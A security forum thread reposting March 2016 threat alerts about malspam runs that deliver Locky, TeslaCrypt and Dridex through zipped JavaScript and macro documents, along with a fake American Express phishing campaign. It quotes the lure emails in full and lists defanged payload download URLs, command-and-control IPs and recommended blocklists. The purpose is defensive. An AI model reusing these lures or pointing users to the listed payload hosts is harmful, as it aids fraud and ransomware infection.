8 March 2016: SCAN_00_242852.zip: Extracts to -2- different .JS files: accent.670345320.js
Current Virus total detections 1/56* and  email.141350705.js (VirusTotal 1/56**).. MALWR [1][2] shows both download of Locky ransomware from http ://lahmar.choukri.perso.neuf .fr/78hg4wg (VirusTotal ***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457438201/

** https://www.virustot...sis/1457438200/

1] https://malwr.com/an...GM1MGFlNWM0NzE/
Hosts
86.65.123.70
37.235.53.18

2] https://malwr.com/an...jgzMzI2ODkyMjI/
Hosts
86.65.123.70
89.108.85.163

*** https://www.virustot...sis/1457439479/
TCP connections
89.108.85.163: https://www.virustot...63/information/
149.154.157.14: https://www.virustot...14/information/

- http://blog.dynamoo....-reference.html
8 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
    From:    Orval Burgess
    Date:    8 March 2016 at 11:10
    Subject:    Compensation - Reference Number #368380
    Dear Customer,
    The mistake made will be compensated promptly, please do not worry.
    Please take a look at the file attached (scanned document) as it contains all the information.
    Sincerely,
    Orval Burgess
    Account Manager

Attached is a file named in a similar format to SCAN_00_368380.zip which contains -TWO- malicious scripts named in a format similar to email.864036956.js (VirusTotal results [1]..) and automated analysis tools [5].. [9].. show binary download locations at:
ministerepuissancejesus .com/o097jhg4g5
ozono. org.es/k7j6h5gf
Those same reports indicate the malware attempts to phone home to the following IPs:
89.108.85.163 (Agava Ltd, Russia)
151.236.14.51 (EDIS, Netherlands)
149.154.157.14 (EDIS, Italy)
37.235.53.18 (EDIS, Spain)
192.121.16.196 (EDIS, Sweden)
Those automated reports all indicate that this is the Locky ransomware.
Recommended blocklist:
89.108.85.163
151.236.14.51
149.154.157.14
37.235.53.18
192.121.16.196 "
(More detail at the dynamoo URL above.)
1] https://www.virustot...e0616/analysis/

5] https://malwr.com/an...DdhNWFiYmVmOWQ/

9] https://www.hybrid-a...environmentId=4
email.297456567.js
email.931921928.js
email.374106319.js
email.864036956.js
___

Fake 'Invoice #' SPAM - JS malware leads to ransomware
- http://myonlinesecur...-to-ransomware/
8 Mar 2016 - "An email with the subject of 'FW: Invoice #733745-2016-03' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads a Locky Ransomware version... The email looks like:
From: Agnes Vaughan <VaughanAgnes08980@ speedy .com.ar>
Date: Tue 08/03/2016 15:12
Subject: FW: Invoice #733745-2016-03
Attachment:
    Dear ellie,
    Please see attached (scanned document) file for your invoice.
    Thank you for your business
    Agnes Vaughan
    Account Manager

8 March 2016: SCAN_2016_03_733745.zip: Extracts to: -2- slightly different sized .JS files
    accent.216401762.js (VT*) and accent.599656717.js (VT**)  
.. MALWR [1] [2] both show a download from http ://het-havenhuis .nl/099oj6hg (VirusTotal 15/57***)
... the second MALWR report clearly shows Locky.. Chrome & Firefox but -not- Internet Explorer -block- this site with big red warnings of malware... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457449790/

** https://www.virustot...sis/1457449826/

1] https://malwr.com/an...mRkYWM5ZjIwN2M/
Hosts
83.137.194.70
212.47.223.19
192.121.16.196
89.108.85.163

2] https://malwr.com/an...2ZlZTFiYmI5NTY/
Hosts
83.137.194.70
212.47.223.19
151.236.14.51

*** https://www.virustot...sis/1457450528/
TCP connections
37.235.53.18: https://www.virustot...18/information/
 

  

Edited by AplusWebMaster, 08 March 2016 - 02:55 PM.

[AplusWebMaster]

FYI...

Fake 'Invoice#' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...ypt-ransomware/
9 Mar 2016 - "An email with the subject of 'Invoice #96187656 for your Order' [random numbered]  pretending to come from Finance Information (random email addresses) with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... The email looks like:
From: Finance Information <root@ free-dreams .nl>
Date: Wed 09/03/2016 07:23
Subject: Invoice #96187656 for your Order
Attachment: invoice_SCAN_yzGbVV.zip
    Good day, dear client!
    We have recently shipped your parcel at you region post office.
    You can find the file bill of your shipment in the attachment. Make sure to check.
    Take care.
    Order/Invoice number:
    96187656
    Order/Invoice date:
    09.03.2016
    Accounts Department
    Wavenet Group
    Incorporating – Titan Technology, Centralcom and S1 Network Services ...

9 March 2016: invoice_SCAN_yzGbVV.zip: Extracts to: invoice_SCAN_yzGbVV.js - Current Virus total detections 8/57*
 MALWR** shows a download of Teslacrypt from http ://howareyouqq .com/25.exe?1 (VirusTotal ***)
NOTE: this also tries to download http ://google .com/25.exe?1 which does not exist and I can only assume that the bad actors have made a mistake in their coding and were probably trying to use the well known open redirect security hole in Google search and other google products... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457508873/

** https://malwr.com/an...mE3MTBlYWZmYzU/
Hosts
185.118.142.154
216.58.219.14

*** https://www.virustot...sis/1457503315/
TCP connections
50.87.28.241: https://www.virustot...41/information/
>> https://www.virustot...2f038/analysis/
___

Fake 'DOC' SPAM - malicious attachment
- http://blog.dynamoo....3008-idris.html
9 Mar 2016 - "This terse spam has a malicious attachment. There is -no- body text.
    From:    Idris Mohammed [idrismohammed25@ gmail .com]
    Date:    9 March 2016 at 09:55
    Subject:    DOC-Z21193008

Attached is a file img-DOC-Z21193008.docm which I have seen two versions of (VirusTotal results [1] [2]). Automated analysis [3] [4].. shows the macro in these two documents downloading from:
gpcarshop .com.br/system/logs/07yhnt7r64.exe
karnavalnye .com/system/logs/07yhnt7r64.exe
There are no doubt several -other- download locations. This binary has a detection rate of 3/56*. The various reports indicate that it phones home to a server at:
64.76.19.251 (Impsat, Argentina)
I strongly recommend that you -block- traffic to that IP. Payload is likely to be the Dridex banking trojan."
1] https://www.virustot...sis/1457517657/

2] https://www.virustot...sis/1457517660/

3] https://malwr.com/an...TEzNmQ0NjVhMDk/

4] https://malwr.com/an...jgyZTExN2U4ODE/

* https://www.virustot...sis/1457518357/
TCP connections
64.76.19.251
8.253.82.126

- http://myonlinesecur...eads-to-dridex/
9 Mar 2016 - "An email with the subject of 'DOC-Z21193008' pretending to come from Idris Mohammed <idrismohammed29@ gmail .com> (random numbers after idrismohammed) with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Idris Mohammed <idrismohammed29@ gmail .com>
Date: Wed 09/03/2016 09:54
Subject:  DOC-Z21193008
Attachment: img-DOC-Z21193008.docm

Body content: completely blank

9 March 2016: img-DOC-Z21193008.docm - Current Virus total detections 4/56*
.. MALWR shows a download of Dridex banking Trojan from
 http ://karnavalnye .com/system/logs/07yhnt7r64.exe (VirusTotal 3/56**)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457518626/

** https://www.virustot...sis/1457518357/
TCP connections
64.76.19.251
8.253.82.126
___

Fake 'Voice msg' SPAM - JS malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
9 Mar 2016 - "An email with the subject of 'Voice Message Attached from +44163311902' – name unavailable [random numbered] pretending to come from voicemail <voicemail@ inclarity .net> with a zip attachment is another one from the current bot runs which downloads Dridex banking malware... The email looks like:
From: voicemail <voicemail@ inclarity .net>
Date:
Subject: Voice Message Attached from +44163311902 – name unavailable
Attachment: 44163311902_20160309_91981473.wav.zip
    Time: Wed, 09 Mar 2016 14:51:02 +0530
    Click attachment to listen to Voice Message

9 March 2016: 44163311902_20160309_91981473.wav.zip: Extracts to: WED2970789413.js - Current Virustotal detections 3/56*
.. MALWR** shows a download of Dridex banking Trojan from http ://variant13 .ru/system/logs/07yhnt7r64.exe  which is the -same- Dridex binary from THIS post***.. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457519130/

** https://malwr.com/an...2QyMDA3NWUyMjk/
Hosts
37.140.192.62
64.76.19.251
13.107.4.50

*** http://myonlinesecur...eads-to-dridex/
___

Fake 'Invoice 2016' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
9 Mar 2016 - "An email saying 'Please find attached 2 invoices for processing' with the subject of 'FW: Invoice 2016-M#184605 [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Ann Guerrero <GuerreroAnn36420@ ono .com>
Date: Wed 09/03/2016 10:38
Subject: FW: Invoice 2016-M#184605
Attachment: Payment_2016_March_184605.zip
    Dear vbygry,
    Please find attached 2 invoices for processing.
    Yours sincerely,
    Ann Guerrero
    Account Manager ...

5 March 2016: Payment_2016_March_184605.zip: Extracts to -2- different files:  
problem.974210026.js [VT*] see_it.001832901.js [VT**]:
.. MALWR [1] [2] -both- show a download of Locky Ransomware from
 http ://planetarchery .com.au/system/logs/q32r45g54 (VirusTotal 5/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457523481/

** https://www.virustot...sis/1457523485/

1] https://malwr.com/an...GQ4OTVhYjExZWY/
Hosts
103.240.88.28
149.154.157.14

2] https://malwr.com/an...TIxZDVkYzViNzE/
Hosts
103.240.88.28
91.195.12.131

*** https://www.virustot...sis/1457524130/
TCP connections
149.154.157.14: https://www.virustot...14/information/

- http://blog.dynamoo....attached-2.html
9 Mar 2016 - "These -fake- financial spam emails come from random sources with different names and reference numbers:
    From:    Melisa Keller
    Date:    9 March 2016 at 12:08
    Subject:    FW: Invoice 2016-M#111812
    Dear server,
    Please find attached 2 invoices for processing.
    Yours sincerely,
    Melisa Keller
    Financial Manager ...

Attached is a file with a name similar to Payment_2016_March_111812.zip which contains -two- scripts, which in the samples I have seen all start with "see_it" or "problem". These malicious scripts all have low detection rates... there may be other download locations. The Malwr reports indicate that the malware phones home to:
78.40.108.39 (PS Internet Company LLC, Kazakhstan)
149.154.157.14 (EDIS, Italy)
The payload is the Locky ransomware.
UPDATE: I received the following information from another source (thank you)...
Additional C2s:
91.195.12.131 (PE Astakhov Pavel Viktorovich, Ukraine)
151.236.14.51 (EDIS, Netherlands)
37.235.53.18 (EDIS, Spain)
Recommended blocklist:
78.40.108.39
149.154.157.14
91.195.12.131
151.236.14.51
37.235.53.18 "
___

Fake 'from Admin' SPAM - JS malware leads to ransomware
- http://myonlinesecur...-to-ransomware/
9 Mar 2016 - "An email with the subject of 'DOC-AA25400B' [random numbered] pretending to come from -admin- <adm323@ victim_domain .tld> the numbers after adm are random Your-own-email-domain with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: admin <adm323@ victim_domain .tld>
Date: Wed 09/03/2016 12:05
Subject: DOC-AA25400B
Attachment: DOC-AA25400B.zip

Totally -blank- body content

9 March 2016: DOC-AA25400B.zip: Extracts to: JGK9027615101.js - Current Virus total detections 5/57*
.. MALWR** shows a download of Locky Ransomware from
 http ://thietbianninhngocphuoc .com/system/logs/98yhb764d.exe (VirusTotal ***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457528965/

** https://malwr.com/an...zU0MmRkYzlhNmI/
Hosts
123.30.187.116: https://www.virustot...16/information/
>> https://www.virustot...bf15c/analysis/
78.40.108.39

*** https://www.virustot...sis/1457528686/
TCP connections
78.40.108.39: https://www.virustot...39/information/
___

AMEX 'PSK' PHISH
- http://myonlinesecur...y-psk-phishing/
9 Mar 2016 - "... a mass run of phishing emails -spoofing- American Express saying 'Please create your Personal Security Key'. There are -3- sites so far discovered that attempt to perform this phishing attack
    http ://americanexpressnew2016 .com/login
    http ://americanexpressglobal .com/login
    http ://axpoglobalverify .com/login
Currently all 3 sites fail to resolve from a UK IP address. They were all registered -yesterday- 8 March 2016 via Todaynic .com using Chinese details which I assume are false. The name servers associated with the domains are DNS1.NEWSITEDNS2 .RU and DNS2.NEWSITEDNS2 .RU
Edit: after a bit of digging around, it appears that the NEWSITEDNS2 .RU has previously been used for Amex and other bank phishing attacks. It is suggested that you -block- their IP numbers to prevent further and future problems:
    155.94.169.106 VirusTotal*
    104.168.62.233 VirusTotal**
    50.2.26.16 VirusTotal***
    148.163.173.227
    192.210.203.49
Either the DNS has not propagated yet worldwide or the DNS service has pulled the domains. My gut feeling is that the bots have sent the emails too early before the sites were live. The date & time on the emails say  Wed 30/09/2015 13:32. I received about -50- copies of these between 03.20 and 03.30 UTC. Be aware and watch out for when these do go live, probably later today...

Screenshot: http://myonlinesecur...ng-1024x558.png "

* https://www.virustot...06/information/

** https://www.virustot...33/information/

*** https://www.virustot...16/information/
___

Some Tips for Preventing Ransomware
- https://isc.sans.edu...l?storyid=20821
Last Updated: 2016-03-09 - "... 'get asked a lot by clients is "how can I prepare/prevent an infection?"
'Prepare' is a good word in this case, it encompasses both prevention and setting up processes for dealing with the infection that will inevitably happen in spite of those preventative processes.  Plus it's the first step in the Preparation / Identification / Containment / Eradication / Restore Service / Lessons Learned Incident Handling process (see SANS SEC 504*..)
* https://www.sans.org...cident-handling
... best advice is - look at how the infection happens, and make this as difficult as possible for the attacker, the same as you would try to prevent any malware. Most malware these days outsources the delivery mechanism - so Cryptowall is typically delivered by an exploit "kit". These days, that typically means the Angler, Rig, or maybe Nuclear exploit kits (Angler being the most prevalent at the moment). These kits aren't magic, they generally try to exploit -old- versions of Java, Flash, Silverlight or take advantage of -missing- Windows updates... When patches come out, the authors of these kits reverse-the-patches and bolt the exploits into their kit..."
(More detail at the isc-diary URL at the top of this post.)
 

  

Edited by AplusWebMaster, 09 March 2016 - 12:41 PM.

[AplusWebMaster]

FYI...

Fake 'random invoice' SPAM - doc macro leads to unknown malware
- http://myonlinesecur...nknown-malware/
10 Mar 2016 - "An email with random invoice or bill subjects coming from random names and emails addresses with a malicious word doc attachment is another one from the current bot runs... A high proportion of these are -not- getting caught by the spam or content filters because they pass SPF & DKIM authentication checks. These have a load of different subjects that include:
    Re: Important Notice About Created Invoice
    Urgent Notification About New Bill
    Re: Last Notice About Paid Bill
    Fwd: Important Message About Unpaid Invoice
    Fwd: Urgent Notice About Paid Bill
    Last Notification About Created Bill
    Fw: Last Message About Last Bill
    Fwd: Urgent Message About New Invoice
    Re: Urgent Message About Created Invoice
    Fw: Last Notification About Unpaid Invoice
The email looks like:
From: Reece Solis <acc@ hai-van .com>
Date: Thu 10/03/2016 04:58
Subject: Re: Important Notice About Created Invoice
Attachment: 4KEEY46Y.doc
    Pls review the report attached.
    Reece Solis
-or-
    check the invoice attached.
    Stuart Sweet
-or
    see the report in attachment.
    Odysseus Mcmillan

10 March 2016: 4KEEY46Y.doc -  Current Virus total detections: [1] [2]..
.. MALWR [3] [4] shows downloads from http ://hoosierpattern .com/a1.jpg?Df1iQh0PABlsu=38 which is a jpg that contains embedded malware that is extracted via the macro & a dropped vbs file to give 339.exe (VirusTotal 4/57*)...
Update: I am reliably informed that this is Dridex banking Trojan and an alternative download location is http ://darrallmacqueen .com/b2.jpg?JzKE5CmWJZnG=
... The jpg it downloads looks like this (screenshot to avoid risks):
> http://myonlinesecur.../03/hoosier.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1457590567/

2] https://www.virustot...sis/1457586170/

3] https://malwr.com/an...TZkNzc0YjAzMDY/
Hosts
172.231.69.95
216.194.172.222: https://www.virustot...22/information/
>> https://www.virustot...343b9/analysis/

4] https://malwr.com/an...TAxMjdkYmZkOGE/
Hosts
172.231.69.95
216.194.172.222

* https://www.virustot...sis/1457591438/

5] https://www.reverse....environmentId=1

6] https://www.reverse....environmentId=4

- http://blog.dynamoo....out-unpaid.html
10 Mar 2016 - "... examples can be seen here*...
* http://myonlinesecur...nknown-malware/
... the only mitigating step I can think of is to -block- traffic to darrallmacqueen .com which should stop the files downloading."

darrallmacqueen .com: 185.9.51.4: https://www.virustot....4/information/

hoosierpattern .com: 216.194.172.222: https://www.virustot...22/information/
>> https://www.virustot...343b9/analysis/
___

Fake 'Attached File' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...eads-to-dridex/
10 Mar 2016 - "An email with the subject of 'Attached File / Attached Doc / Attached Document' pretending to come from a scanner or printer at your own domain  with a zip attachment is another one from the current bot runs which downloads what looks like Dridex banking Trojan - EDIT: it is LOCKY ransomware not Dridex... The attachment name is created from the recipients email address and 2 sets of random numbers. So far I have seen these sent from:
    epson@ victimdomain .tld
    canon@ victimdomain .tld
    xerox@ victimdomain .tld
    copier@ victimdomain .tld
    scanner @victimdomain .tld
The email looks like:
From: epson@ victim domain .tld
Date: Thu 10/03/2016 07:11
Subject: Attached File / Attached Doc / Attached Document
Attachment: xerox.994@ thespykiller .co.uk_385010_151064713.zip

Body content: totally -empty- blank body

10 March 2016: xerox.994@thespykiller.co.uk_385010_151064713.zip: Extracts to: IIE1525816908.js
Current Virus total detections 5/57*
.. MALWR** shows a download of what looks like Dridex banking Trojan from http ://buyfuntees .com/system/logs/7t6f65g.exe (VirusTotal 5/56***) Update: it is Locky ransomware not Dridex. Dynamo’s blog[4] has these additional download locations:
behrozan .ir/system/logs/7t6f65g.exe
fashion-boutique .com.ua/system/logs/7t6f65g.exe
fortyseven .com.ar/system/logs/7t6f65g.exe  (VirusTotal 1/56[5])
iwear .md/system/logs/7t6f65g.exe
lady-idol.6te .net/system/logs/7t6f65g.exe
ncrweb .in/system/logs/7t6f65g.exe
xn--b1afonddk2l .xn--p1ai/system/logs/7t6f65g.exe ..."

* https://www.virustot...sis/1457597941/

** https://malwr.com/an...GFkMzA2MzIwMzk/
Hosts
67.225.233.214
91.219.30.254

*** https://www.virustot...sis/1457598134/
TCP connections
91.234.33.149: https://www.virustot...49/information/

4] http://blog.dynamoo....ached-file.html
10 Mar 2016 - "This spam has a malicious attachment. It appears to come from within the sender's own-domain. There is no-body-text.
    From:    canon@ victimdomain .tld
    Date:    10 March 2016 at 09:02
    Subject:    Attached File

... Sender is canon or copier or epson or scanner or xerox at the victim's domain.
Recommended blocklist:
31.184.196.78
78.40.108.39
91.219.30.254
91.234.33.149 "

5] https://www.virustot...sis/1457604744/
TCP connections
31.184.196.78: https://www.virustot...78/information/
___

Fake 'Unpaid Issue' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...-to-teslacrypt/
10 Mar 2016 - "An email with the subject of 'GreenLand Consulting Unpaid Issue No. 14599' [random numbered]  pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: Goldie dawson <dawsonGoldie888@ lamelba .fr>
Date: Thu 10/03/2016 13:28
Subject: GreenLand Consulting   Unpaid Issue No. 14599
Attachment: Invoice_ref-99527554.zip
    Dear Client!
    For the third time we are reminding you about your unpaid debt.
    You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 14599. But it has never been paid off.
    We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly.
    Otherwise we will have to start a legal action against you.
    Respectfully,
    Goldie dawson
    Chief Accountant ...

10 March 2016: Invoice_ref-99527554.zip: Extracts to: invoice_copy_AczFAX.js - Current Virus total detections 3/57*
.. MALWR** shows a download of Teslacrypt from http ://hellomississmithqq .com/69.exe?1 (VirusTotal ***)
.. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457616298/

** https://malwr.com/an...zMxYjM5ZGU5YjQ/
Hosts
185.118.142.154
149.154.157.14
91.195.12.131
151.236.14.51
37.235.53.18
78.40.108.39

*** https://www.virustot...sis/1457617418/

- http://blog.dynamoo....consulting.html
10 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
From:    Jennie bowles
Date:    10 March 2016 at 12:27
Subject:    GreenLand Consulting – Unpaid Issue No. 58833
Dear Client!
For the third time we are reminding you about your unpaid debt.
You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 58833. But it has never been paid off.
We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly.
Otherwise we will have to start a legal action against you.
Respectfully,
Jennie bowles
Chief Accountant ...

... scripts attempt to download a malicious binary... Recommended blocklist:
142.25.97.48
185.118.142.154
78.135.108.94
74.117.183.252
91.243.75.135
91.195.12.131
149.154.157.14
151.236.14.51
37.235.53.18
78.40.108.39
178.162.214.146 "
 

  

Edited by AplusWebMaster, 10 March 2016 - 08:33 AM.

[AplusWebMaster]

FYI...

Fake 'Amazon order' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
11 Mar 2016 - "An email with the subject of 'Your Amazon order #204-217966-773659' [random numbered] pretending to come from AMAZON.COM <no-reply@ Amazon .com> with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: http://myonlinesecur...59-1024x656.png

11 March 2016: ORD204-217966-773659.zip: Extracts to: ZGQ8748487803.js - Current Virus total detections 6/57*
.. MALWR** shows a download of Locky ransomware from http ://onsancompany .com/system/logs/uy78hn654e.exe
(VirusTotal 5/57***). Other download locations so far discovered for Locky today include:
solucionesdubai .com.ve/system/logs/uy78hn654e.exe
ghayatv .com/system/logs/uy78hn654e.exe
dolcevita-ykt .ru/system/logs/uy78hn654e.exe
mercadohiper .com.br/system/logs/uy78hn654e.exe
chinhuanoithat .com/system/logs/uy78hn654e.exe
http ://nhinh .com/system/logs/uy78hn654e.exe
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457692698/

** https://malwr.com/an...zU3OWVlZTZjNDg/
Hosts
103.18.4.151
31.184.196.78
91.219.30.254

*** https://www.virustot...sis/1457691942/
TCP connections
31.184.196.75: https://www.virustot...75/information/


- http://blog.dynamoo....-order-137.html
11 Mar 2016 - "This fake Amazon spam comes with a malicious attachment:
    From:    AMAZON.COM [Mailer-daemon@ amazon .com]
    Date:    11 March 2016 at 09:09
    Subject:    Your Amazon order #137-89653734-2688148
    Hello,
    Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.com.
    Order Details
    Order #137-89653734-2688148 Placed on March 11, 2016
    Order details and invoice in attached file.
    Need to make changes to your order? Visit our Help page for more information and video guides.
    We hope to see you again soon.
    Amazon .com

Reference numbers vary from email to email. Attached is a file with a name similar to ORD137-89653734-2688148.zip which contains a malicious script... Recommended blocklist:
31.184.196.75
91.219.30.254
78.40.108.39
31.184.196.78
91.234.32.192 "
___

Fake 'Scanned image' SPAM - leads to malware
- http://blog.dynamoo....image-data.html
11 Mar 2016 - "This -fake- document scan leads to malware. It appears to come from within the victim's own domain, but this is a trivial forgery.
    From:    admin [lands375@ victimdomain .tld]
    Date:    11 March 2016 at 09:02
    Subject:    Scanned image
    Image data in PDF format has been attached to this email.

Attached is a document named in a similar format to 11-03-2016-6440705503.zip which contains a randomly-named malicious script. So far I have seen -three- versions of this script (VirusTotal results [1] [2] [3]) which according to the Malwr reports [4].. download a malicious binary from:
ghayatv .com/system/logs/uy78hn654e.exe
This is Locky ransomware, the -same- as dropped in this other spam run* - that post also contains a list of C2s to block."
* http://blog.dynamoo....-order-137.html

1] https://www.virustot...sis/1457690743/

2] https://www.virustot...5c931/analysis/

3] https://www.virustot...sis/1457691017/

4] https://malwr.com/an...WM3ZjcyYWUzM2E/
___

Fake 'Payment' SPAM - leads to Locky ransomware
- http://myonlinesecur...cky-ransomware/
11 Mar 2016 - "An email with the subject of 'Pay for driving on toll road, invoice #00212297' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky ransomware.. The email looks like:
From: Inez Harding <HardingInez04459@ jazztel .es>
Date: Fri 11/03/2016 08:15
Subject: FW: Payment 16-03-#280729
Attachment: payment_doc_280729.zip
    Dear voicemail,
    We have received this documents from your bank, please review attached documents.
    Yours sincerely,
    Inez Harding
    Account Manager

5 March 2016: payment_doc_280729.zip: Extracts to 2 files:
Post_Tracking_Label_id00-371904814#.js [VT*] [VT**]. MALWR [1] [2] shows -both- download Locky Ransomware  from http ://50.28.211.199 /hdd0/89o8i76u5y4 (VirusTotal 5/56***). I am informed[3] that there are several other download locations, all of which appear to be offering a slightly -different- Locky ransomware download... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457687806/

** https://www.virustot...sis/1457687807/

1] https://malwr.com/an...jcxZGYwZTM0YjE/
Hosts
50.28.211.199
31.184.196.78
91.234.32.192

2] https://malwr.com/an...zQ4NTljYmRkZjE/
Hosts
50.28.211.199
91.234.33.149
31.184.196.78
31.184.196.75

*** https://www.virustot...sis/1457689671/
TCP connections
91.219.30.254: https://www.virustot...54/information/

3] http://blog.dynamoo....-507586-we.html
11 Mar 2016 - "These spam messages come from various senders with different references and attachment names.
    From:    Thanh Sears
    Date:    11 March 2016 at 10:29
    Subject:    FW: Payment 16-03-#507586
    Dear [redacted],
    We have received this documents from your bank, please review attached documents.
    Yours sincerely,
    Thanh Sears
    Financial Manager

Attached is a ZIP file named in the format payment_doc_507586.zip, containing a randomly named script... The dropped binaries are actually different [1] [2] and both look like Locky ransomware. The C2s to -block- are the same as found in this earlier Locky run*..."
1] https://www.virustot...sis/1457693183/

2] https://www.virustot...sis/1457693194/

* http://blog.dynamoo....-order-137.html
___

Massive Volume of Ransomware Downloaders being Spammed
- https://www.trustwav...-being-Spammed/
March 9, 2016 - "We are currently seeing extraordinarily huge volumes of JavaScript attachments being spammed out, which, if clicked on by users, lead to the download of a ransomware. Ransomware encrypts data on a hard drive, and then demands payment from the victim for the key to decrypt the data. Our Spam Research Database saw around 4 million malware spams in the last -seven- days, and the malware category as a whole accounted for 18% of total spam arriving at our spam traps... your last line of defense against ransomware infection is always having an up to date and good backup process."
 

  

Edited by AplusWebMaster, 11 March 2016 - 01:26 PM.

[AplusWebMaster]

FYI...

Fake 'Urgent Notice' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...ypt-ransomware/
Last revised 12 March 2016 - "An email with the subject of 'Urgent Notice # 96954696' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt or locky ransomware...
Update 12 March 2016: Unusual for a Saturday.. they are going after the domestic/consumer market instead of office/Enterprise/companies. Another big malspam run of this email today with malicious js attachments (VirusTotal 12/57*). (MALWR**) with a connection to and download of http ://joecockerhereqq .com/80.exe?1 (VirusTotal 5/57***). This definitely looks like Teslacrypt...
WARNING: following the MALWR links will give a browser warning in ALL browsers. Their SSL certificate has -expired- yesterday 11 March 2016. In this case -ONLY- it is safe to ignore the warning and visit the site until they install the updated certificate.. The email looks like:
From: Lacy eaton <eatonLacy97994@ listenary .com>
Date: Fri 11/03/2016 20:42
Subject: Urgent Notice # 96954696
Attachment: statistic_96954696.zip
    Dear Customer!
    According to our data you owe our company a sum of $877,13. There are records saying that you have ordered goods in a total amount of $ 877,13 in the third quarter of 2015.
    Invoice has been paid only partially. The unpaid invoice #96954696 is enclosed below for your revision.
    We are writing to you, hoping for understanding and in anticipation of the early repayment of debt.
    Please check out the file and do not hesitate to pay off the debt.
    Otherwise we will have to start a legal action against you.
    Regards,
    Lacy eaton ...

11March 2016: statistic_96954696.zip: Extracts to: details_jEpMnR.js - Current Virus total detections [4] .. MALWR[5] shows a download of teslacrypt or locky from http ://joecockerhereqq .com/69.exe?1 or http ://joecockerhereff .com/69.exe?1 (VirusTotal [6]) Payload Security Hybrid analysis [7]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457728759/

** https://malwr.com/an...DJhN2U0MTMzYTU/
Hosts
54.212.162.6
203.124.115.1
166.62.4.223

*** https://www.virustot...sis/1457772426/
TCP connections
203.124.115.1: https://www.virustot....1/information/
166.62.4.223: https://www.virustot...23/information/

4] https://www.virustot...sis/1457728932/

5] https://malwr.com/an...mM0NGNmZWZlNWE/
Hosts
212.119.87.77
204.44.102.164

6] https://www.virustot...sis/1457731360/
TCP connections
91.219.30.254: https://www.virustot...54/information/

7] https://www.hybrid-a...environmentId=1
91.234.32.192: https://www.virustot...92/information/
>> https://www.virustot...fd9c6/analysis/

- http://blog.dynamoo....e-78815053.html
12 Mar 2016 - "This spam comes from random senders, and has random references, dollar amounts and attachment names:
    From:    Donnie emily
    Date:    12 March 2016 at 14:01
    Subject:    Urgent Notice # 78815053
    Dear Customer!
    According to our data you owe our company a sum of $452,49. There are records saying that you have ordered goods in a total amount of $ 452,49 in the third quarter of 2015.
    Invoice has been paid only partially. The unpaid invoice #78815053 is enclosed below for your revision.
    We are writing to you, hoping for understanding and in anticipation of the early repayment of debt.
    Please check out the file and do not hesitate to pay off the debt.
    Otherwise we will have to start a legal action against you.
    Regards,
    Donnie emily ...

Attached is a randomly-named ZIP files, in the sample I have seen... plus a random string of characters. I have seen -six- versions of this script... This is Teslacrypt ransomware, although it is possible that some variants of this message may drop Locky. Both these binaries are slightly different... malicious domains are also on the same servers... there are a vast number of malicious IPs and servers in this cluster...
Recommended blocklist:
192.210.144.130
54.212.162.6
212.119.87.77
78.135.108.94
31.184.196.78
91.234.32.192
